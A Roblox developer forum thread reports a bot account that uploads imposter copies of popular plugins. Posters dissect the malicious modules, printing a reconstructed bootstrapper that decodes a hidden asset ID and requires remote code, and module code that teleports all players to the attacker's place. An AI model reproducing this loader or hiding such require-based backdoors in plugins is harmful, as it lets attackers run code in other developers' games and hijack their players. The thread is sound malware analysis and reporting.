Plugin Bot Spam/Imposter

Bug Reports Website Bugs
#1

image
image828×568 37.7 KB

This person “PluginCreator” seems to be copying the name/description of popular plugins and uploading a large mass of them.

Here’s an example; @EchoReaper’s CSG intersect plugin. There are many duplicates of the plugin with the name which makes finding the plugin hard.

I don’t know if this plugin attempts to actually copy scripts or other stuff, maybe even an encode of the entire place, within studio upon landing into studio with it installed and sends it to a website for decipher with HttpService.

Let’s hope something can be done about this.

7 Likes
#2

Looks like he’s done this with a lot of plugins. They all insert scripts which require this module:

https://www.roblox.com/library/1194217533/BASE

No idea what it does since it’s private, but more than likely something malicious.

3 Likes
#3

should plugins be verified?

#4

Verification doesn’t seem like it’d stop the botting problem. Ideally it’d put the real ones up front before the illegitimate ones, but we’d still see users installing malicious plugins or taking malicious models. It also wouldn’t help with non-popular creations. Roblox needs to refine the search so items uploaded by dummy accounts that don’t exhibit any behavior a real human would don’t show up in the results. This could help with clothing copying as well.

We also need a permission system for 3rd-party scripts so users can’t hide require(xxxxxxxx) 1000 columns over in blank space.

6 Likes
#5

Lol this happens on YouTube too (with videos, of course)

Really annoyingTM

Somehow one of my old, crappy thumbnail tutorials managed to get on the radar of a bot. Now searching my name on YouTube will come up with…

this...*

Screenshot_350
Screenshot_350745×901 275 KB

*if you add -splash to the search (JoJo :frowning:)

Happy days

#6

Yeah, that’s a thing. YouTube ain’t gonna do anything about it though.
https://devforum.roblox.com/t/the-scambots-are-back/53136
https://devforum.roblox.com/t/free-robux-videos-showing-when-i-search-my-name-on-youtube/40973?source_topic_id=53136

2 Likes
#7

After figuring out how, I decided to probe this 1194217533 module.

First, it exits if the module is running in studio, by checking RunService:IsStudio.
Next, it calls GetProductInfo for this place.
It gets the Description field, decodes it as JSON, and gets the “followId” field.
Then it appears to parse this value in some way. By the end, it has another asset ID, which it requires.
The resulting module returns a function which is called immediately.
Then, some function is pcalled every 30 seconds.

And that’s as far as I got, for now.

5 Likes
#8

Maybe a script to teleport all players to another game?

#9

When I was trying to figure out how it works, that’s exactly what it did.

It decodes the module ID of a second module which would teleport me to a certain game every time.

1 Like
#10

Some follow up. I’ve written a wrapper that proxies every value in a function’s environment, allowing me to hook into which APIs are accessed. It also can spoof values, and block access to sensitive APIs.

The 1194217533 module is a bootstrapper. Here’s a somewhat equivalent source based on what I’ve been able to gather:

-- Exit if in studio.
if not game:GetService("RunService"):IsStudio() then
	return
end

-- Get remote data.
local PlaceId = 1194188859
local description = game:GetService("MarketplaceService"):GetProductInfo(PlaceId).Description
local followId = game:GetService("HttpService"):JSONDecode(description).followId

-- Decode module ID.
local cipher = {j=0, h=1, y=2, l=3, x=4, b=5, n=6, m=7, k=8, s=9}
local id = ""
for i = 1, #followId do
	id = id .. cipher[followId:sub(i,i)]
end

-- Bootstrap module.
require(tonumber(id))()

while true do
	wait(30)
	s, m = pcall(func()
		-- Unknown contents.
		-- Does not seem to access any APIs.
		-- Throws a "C stack overflow" error
	end)
	-- Maybe some more stuff that would use `s` and `m` here.
end

It could be made more accurate by hooking bits of the API with debug.traceback, which will leak line numbers within the module.

I’m not sure what the pcalled function is doing. It may be that the wrapper is throwing the error.

This user has uploaded many repeated modules, the latest of which is bootstrapped. Given that the user is already familiar with bots, I think they use a tool that does the following:

  1. Uploads a payload module.
  2. Encodes the module’s asset ID using a simple cipher.
  3. Updates the description of 1194188859 to point to the encoded ID.

On a final note, if you want to harden the security of your private modules, make sure that no returned function accesses its environment table, since it can be easily swapped out with setfenv.

3 Likes
#11

This has also been happening with other items in the catalog/library.

spam
spam1464×682 340 KB

(This was reported in a bug report as well).

#12

Account seems to be connected to PluginCreator

https://www.roblox.com/users/445831407/inventory/#!/plugins

One of the guys models includes a Module that teleports players to PluginCreator's Place - Roblox

return (function() local players = game:GetService("Players"):GetPlayers()
local ts = game:GetService("TeleportService")
local pid = 1195736381
for _, player in pairs(players) do
	ts:Teleport(pid, player)
end end)

Another one teleports to his place

return (function() local players = game.Players:GetPlayers()
local teleportService = game:service'TeleportService'
for i,v in pairs(players) do
  teleportService:Teleport(1194188859, v)
end end)
#13

Good work @Anaminus, you’re spot on. However, seems like the guy uses the description to further obscure the purpose. The current value led me to an asset that contains this:

return (function() print() end)
1 Like
#14

Just look into the users models. That is where it all leads to.

#15

I know who it is… this guy DM’d me asking if I’d put the call in my plugin and he told me what it does.

allow remote script execution without httpservice or loadstrings

If anyone would like more information as to who this guy is, I can give you his Twitter and his most common alias. Just DM me. x.com

Edit: he’s someone who you probably all know if you were ever on Twitter

#16

Is he/she on the forums?

#17

Negative, if he was I wouldn’t have posted. I only posted because this is a private topic

#18

Yeah, they’ve been doing it to my videos as well and it gets annoying. Very misleading.

#19

PluginCreator is banned but all his plugins are still around and it really makes it hard to find plugins when 500 out of 530 of your search results are garbage plugins that install malicious module scripts into your game. Is it possible to delete all the plugins that got uploaded by the account?

4 Likes
#20

Ye those plugins need to be deleted, the spam is awful and it prevents people from finding the useful plugins that are actually legit.